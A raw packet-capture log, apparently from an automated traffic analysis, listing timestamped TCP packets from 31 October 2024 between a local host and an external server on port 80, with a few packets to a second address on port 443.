                                                                                                                                            Oct 31, 2024 17:12:19.434233904 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.434267998 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.434281111 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.434312105 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.434812069 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.434844971 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.434878111 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.434901953 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.434920073 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.435651064 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.435702085 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.435708046 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.435735941 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.435753107 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.435789108 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.436475039 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.436510086 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.436530113 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.436547995 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.436553955 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.436588049 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.436608076 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.436630011 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.437339067 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.437372923 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.437407017 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.437427998 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.437441111 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.437460899 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.437483072 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.438167095 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.438201904 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.438235998 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.438241005 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.438251972 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.438276052 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.439060926 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.439114094 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.439126968 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.439148903 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.439161062 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.439184904 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.439192057 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.439273119 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.439718008 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.439752102 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.439776897 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.439785004 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.439788103 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.439821005 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.439994097 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.440598011 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.440632105 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.440665007 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.440684080 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.440699100 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.440709114 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.440732002 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.440740108 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.440777063 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.441524982 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.441557884 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.441579103 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.441593885 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.441606045 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.441639900 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.441646099 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.441674948 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.442420006 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.442454100 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.442481995 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.442487955 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.442502975 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.442522049 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.442537069 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.442563057 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.443582058 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.443619013 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.443651915 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.443654060 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.443670034 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.443682909 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.443686962 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.443721056 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.443732977 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.443763971 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.444200039 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.444235086 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.444263935 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.444277048 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.550036907 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.550121069 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.550137997 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.550154924 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.550167084 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.550209999 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.550242901 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.550259113 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.550277948 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.550282001 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.550312996 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.550359964 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.551035881 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.551071882 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.551106930 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.551106930 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.551120043 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.551251888 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.551656008 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.551690102 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.551724911 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.551759005 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.551759958 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.551786900 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.551810026 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.552465916 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.552500010 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.552525997 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.552536011 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.552536011 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.552571058 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.552609921 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.553410053 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.553445101 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.553466082 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.553481102 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.553498030 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.553515911 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.553642988 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.554394007 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.554429054 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.554461956 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.554478884 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.554497004 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.554512978 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.554529905 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.554536104 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.554579973 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.555381060 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.555416107 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.555449963 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.555458069 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.555465937 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.555485964 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.555502892 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.555543900 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.556314945 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.556350946 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.556365013 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.556385040 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.556394100 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.556421995 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.556427956 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.556456089 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.556463003 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.556498051 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.557326078 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.557363033 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.557395935 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.557396889 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.557420015 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.557430029 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.557430983 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.557476044 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.558099985 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.558135033 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.558168888 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.558192968 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.558202028 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.558219910 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.558235884 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.558244944 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.558271885 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.558304071 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.558326006 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.559042931 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.559077978 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.559113026 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.559115887 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.559133053 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.559148073 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.559181929 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.559192896 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.559223890 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.559999943 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.560035944 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.560069084 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.560081959 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.560103893 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.560110092 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.560137987 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.560156107 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.560172081 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.560177088 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.560357094 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.560961962 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.561012030 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.561045885 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.561069012 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.561080933 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.561094046 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.561189890 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.668016911 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.668137074 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.668168068 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.668199062 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.668231964 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.668437004 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.668471098 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.668519974 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.668647051 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.668683052 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.668715954 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.668736935 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.668754101 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.669147968 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.669183016 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.669215918 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.669245005 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.669250965 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.669258118 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.669289112 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.669332981 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.670037031 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.670072079 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.670125008 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.670129061 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.670160055 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.670166016 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.670191050 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.670233011 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.670944929 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.670979977 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.670998096 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.671014071 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.671022892 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.671049118 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.671056032 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.671082973 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.671118021 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.671123981 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.671786070 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.671821117 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.671840906 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.671854973 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.671860933 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.671890020 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.671921968 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.671932936 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.671962023 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.672647953 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.672683954 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.672699928 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.672719002 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.672725916 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.672760963 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.687961102 CET49755443192.168.2.452.149.20.212
                                                                                                                                            Oct 31, 2024 17:12:19.688002110 CET4434975552.149.20.212192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.688018084 CET49755443192.168.2.452.149.20.212
                                                                                                                                            Oct 31, 2024 17:12:19.688026905 CET4434975552.149.20.212192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.789664030 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.789727926 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.789766073 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.789810896 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.789835930 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.790064096 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.790100098 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.790134907 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.790150881 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.790178061 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.790477991 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.790508032 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.790523052 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.790544987 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.908011913 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.908077002 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.908132076 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.908169031 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.908216000 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.908557892 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.908591986 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.908612013 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.908631086 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.908638000 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.908668995 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.908714056 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.909096003 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.909131050 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.909163952 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.909176111 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.909212112 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.909729004 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.909764051 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.909797907 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.909818888 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.909833908 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.909847975 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.909883022 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.909883976 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.909928083 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.910509109 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.910542965 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.910562992 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.910578012 CET8049754185.235.128.16192.168.2.4
                                                                                                                                            Oct 31, 2024 17:12:19.910588980 CET4975480192.168.2.4185.235.128.16
                                                                                                                                            Oct 31, 2024 17:12:19.910620928 CET4975480192.168.2.4185.235.128.16
